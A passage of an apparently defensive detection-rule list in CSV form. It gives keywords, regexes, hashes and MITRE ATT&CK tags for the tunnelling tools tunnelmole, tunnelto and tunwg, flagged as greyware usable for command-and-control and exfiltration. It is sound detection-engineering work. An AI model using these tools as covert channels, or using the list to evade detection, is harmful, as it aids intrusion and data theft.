Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*\tunnelmole.bundle.js*",".{0,1000}\\tunnelmole\.bundle\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*25191b226ad7ef139f81890c531b0c606c5645bbca6f149b3679b06c73e6cddc*",".{0,1000}25191b226ad7ef139f81890c531b0c606c5645bbca6f149b3679b06c73e6cddc.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","#filehash","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*2b4328c30b58ecaf6febe1d7225b543b8886dcb4d8295be5973e6dc36f62c0f2*",".{0,1000}2b4328c30b58ecaf6febe1d7225b543b8886dcb4d8295be5973e6dc36f62c0f2.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","#filehash","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*dashboard.tunnelmole.com*",".{0,1000}dashboard\.tunnelmole\.com.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*f38fg.tunnelmole.net*",".{0,1000}f38fg\.tunnelmole\.net.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 
- TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*http://*.tunnelmole.net*",".{0,1000}http\:\/\/.{0,1000}\.tunnelmole\.net.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*https://*.tunnelmole.net*",".{0,1000}https\:\/\/.{0,1000}\.tunnelmole\.net.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*https://tunnelmole.com/docs*",".{0,1000}https\:\/\/tunnelmole\.com\/docs.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*https://tunnelmole.com/downloads/tmole.exe*",".{0,1000}https\:\/\/tunnelmole\.com\/downloads\/tmole\.exe.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*install.tunnelmole.com",".{0,1000}install\.tunnelmole\.com","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*node tunnelmole.js*",".{0,1000}node\stunnelmole\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*npm install -g tunnelmole*",".{0,1000}npm\sinstall\s\-g\stunnelmole.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*npm install* tunnelmole*",".{0,1000}npm\sinstall.{0,1000}\stunnelmole.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*--output tmole.exe*",".{0,1000}\-\-output\stmole\.exe.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*robbie-cahill/tunnelmole-client*",".{0,1000}robbie\-cahill\/tunnelmole\-client.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" 
"*service.tunnelmole.com*",".{0,1000}service\.tunnelmole\.com.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*tmole - Share your local server with a Public URL*",".{0,1000}tmole\s\-\sShare\syour\slocal\sserver\swith\sa\sPublic\sURL.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*tmole --set-api-key *",".{0,1000}tmole\s\-\-set\-api\-key\s.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*'Tunnelmole Service listening on http port *",".{0,1000}\'Tunnelmole\sService\slistening\son\shttp\sport\s.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*Tunnelmole Service listening on websocket port *",".{0,1000}Tunnelmole\sService\slistening\son\swebsocket\sport\s.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" 
"*tunnelmole/cjs*",".{0,1000}tunnelmole\/cjs.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*TUNNELMOLE_TELEMETRY*",".{0,1000}TUNNELMOLE_TELEMETRY.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "* install tunnelto*",".{0,1000}\sinstall\stunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*""User-Agent"", ""tunnelto-client""*",".{0,1000}\""User\-Agent\"",\s\""tunnelto\-client\"".{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*../tunnelto_lib*",".{0,1000}\.\.\/tunnelto_lib.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*.tunnelto.dev*",".{0,1000}\.tunnelto\.dev.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*/tunnelto.git*",".{0,1000}\/tunnelto\.git.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*/tunnelto/releases/latest*",".{0,1000}\/tunnelto\/releases\/latest.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*/tunnelto_server*",".{0,1000}\/tunnelto_server.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*/tunnelto_server/*",".{0,1000}\/tunnelto_server\/.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*/tunnelto_server:*",".{0,1000}\/tunnelto_server\:.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*@tunnelto.dev*",".{0,1000}\@tunnelto\.dev.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public 
URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*\.tunnelto\key.token*",".{0,1000}\\\.tunnelto\\key\.token.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*84a0a90cde73607684db0142f2d9cd8e636f089514eba57835ec10806d8f5f4b*",".{0,1000}84a0a90cde73607684db0142f2d9cd8e636f089514eba57835ec10806d8f5f4b.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#filehash","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*99736bcb172f9cbed127f25a80a6b91fe355c4673461878962d7b5ac94782db1*",".{0,1000}99736bcb172f9cbed127f25a80a6b91fe355c4673461878962d7b5ac94782db1.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#filehash","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*agrinman/tap/tunnelto*",".{0,1000}agrinman\/tap\/tunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*agrinman/tunnelto*",".{0,1000}agrinman\/tunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*--bin tunnelto*",".{0,1000}\-\-bin\stunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*--bin tunnelto_server*",".{0,1000}\-\-bin\stunnelto_server.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*--bin=tunnelto*",".{0,1000}\-\-bin\=tunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*--bin=tunnelto_server*",".{0,1000}\-\-bin\=tunnelto_server.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*cb70ca2937afdb647a8716f0b0d122f71f91dd7ce777250d0d2573f0ec47c5fc*",".{0,1000}cb70ca2937afdb647a8716f0b0d122f71f91dd7ce777250d0d2573f0ec47c5fc.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#filehash","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" 
"*f6e06ec835c02ff1f08cc12c77b067bce8eddd96b9015cefef250353c89e1fbd*",".{0,1000}f6e06ec835c02ff1f08cc12c77b067bce8eddd96b9015cefef250353c89e1fbd.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#filehash","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*ghcr.io/agrinman/tunnelto*",".{0,1000}ghcr\.io\/agrinman\/tunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*tunnelto inspector*",".{0,1000}tunnelto\sinspector.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*tunnelto --port *",".{0,1000}tunnelto\s\-\-port\s.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*tunnelto_server/src/*",".{0,1000}tunnelto_server\/src\/.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*tunnelto-linux.tar.gz*",".{0,1000}tunnelto\-linux\.tar\.gz.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*tunnelto-windows.exe*",".{0,1000}tunnelto\-windows\.exe.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "*wormhole.tunnelto.dev*",".{0,1000}wormhole\.tunnelto\.dev.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z" "* tunwg.exe*",".{0,1000}\stunwg\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*./tunwg --*",".{0,1000}\.\/tunwg\s\-\-.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*.l.tunwg.com*",".{0,1000}\.l\.tunwg\.com.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*/bin/tunwg*",".{0,1000}\/bin\/tunwg.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*/latest/download/tunwg*",".{0,1000}\/latest\/download\/tunwg.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*/tunwg.exe*",".{0,1000}\/tunwg\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*/tunwg.git*",".{0,1000}\/tunwg\.git.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*/tunwg@latest*",".{0,1000}\/tunwg\@latest.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*/tunwg-arm64.exe*",".{0,1000}\/tunwg\-arm64\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*\tunwg.exe*",".{0,1000}\\tunwg\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*\tunwg-arm64.exe*",".{0,1000}\\tunwg\-arm64\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*067fca2b141364d273b05e14a8f01d961d80d9599b8658a02a4f486510b9b89b*",".{0,1000}067fca2b141364d273b05e14a8f01d961d80d9599b8658a02a4f486510b9b89b.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*0f1ccf4c5e7eada818bafad12e911a4d122a8329f7287ea0e4903ee1398e72f9*",".{0,1000}0f1ccf4c5e7eada818bafad12e911a4d122a8329f7287ea0e4903ee1398e72f9.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*175c54eb22bc4eeb089586244b2863d53e14fbe8be999be5574901aa0a726744*",".{0,1000}175c54eb22bc4eeb089586244b2863d53e14fbe8be999be5574901aa0a726744.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*2664814fc6bac015389cad412970cb6617f38a653f30585060c158f4d7963527*",".{0,1000}2664814fc6bac015389cad412970cb6617f38a653f30585060c158f4d7963527.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - 
T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*2cf91adccb7872c4e0526ac1b4c5d9ccb539dcd9f3c2c85daba0837fb2483e2b*",".{0,1000}2cf91adccb7872c4e0526ac1b4c5d9ccb539dcd9f3c2c85daba0837fb2483e2b.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*3451e50cf07aa0e206cc3a632482276574f820542860187ffb8ec2221453a875*",".{0,1000}3451e50cf07aa0e206cc3a632482276574f820542860187ffb8ec2221453a875.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*393d1d4e9992cbda5a9980c25d9d16890b18f276fc08a44c5855b3a14f4be894*",".{0,1000}393d1d4e9992cbda5a9980c25d9d16890b18f276fc08a44c5855b3a14f4be894.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*3a52dc3df7ea98057fb163965ed3390702a95a57e8b4e5e263c7efeb83908577*",".{0,1000}3a52dc3df7ea98057fb163965ed3390702a95a57e8b4e5e263c7efeb83908577.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" 
"*3bcd2aa02fed9aad200636add540ac159c082eb6058a9da45ed0dc7410713f38*",".{0,1000}3bcd2aa02fed9aad200636add540ac159c082eb6058a9da45ed0dc7410713f38.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*574583d2e4b8f71d7aa57ed24c4015e37bdfe937bcd7f0d708f300eac9bc33e2*",".{0,1000}574583d2e4b8f71d7aa57ed24c4015e37bdfe937bcd7f0d708f300eac9bc33e2.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*6d7d84fd5a11387aa706ed690f5855893594d5ded8ddeaf49cb449927c071f5f*",".{0,1000}6d7d84fd5a11387aa706ed690f5855893594d5ded8ddeaf49cb449927c071f5f.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*72b86dc356b7f6708f1996cf2085fd66a75d05e04ab728c245db5d660f645281*",".{0,1000}72b86dc356b7f6708f1996cf2085fd66a75d05e04ab728c245db5d660f645281.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*8d3cb4cbaa6643fd38caec3505f0541a56883504a65759e38e8a9e8764a5f4c7*",".{0,1000}8d3cb4cbaa6643fd38caec3505f0541a56883504a65759e38e8a9e8764a5f4c7.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*9e66f8414c42c546b1d73672929a13285681ab0862f8ed9aa75d048dd5aa00e7*",".{0,1000}9e66f8414c42c546b1d73672929a13285681ab0862f8ed9aa75d048dd5aa00e7.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*a8ea3cb39c602716d396076e7621a61e3df77e4e08377f33c6aebf4cc970f26c*",".{0,1000}a8ea3cb39c602716d396076e7621a61e3df77e4e08377f33c6aebf4cc970f26c.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - 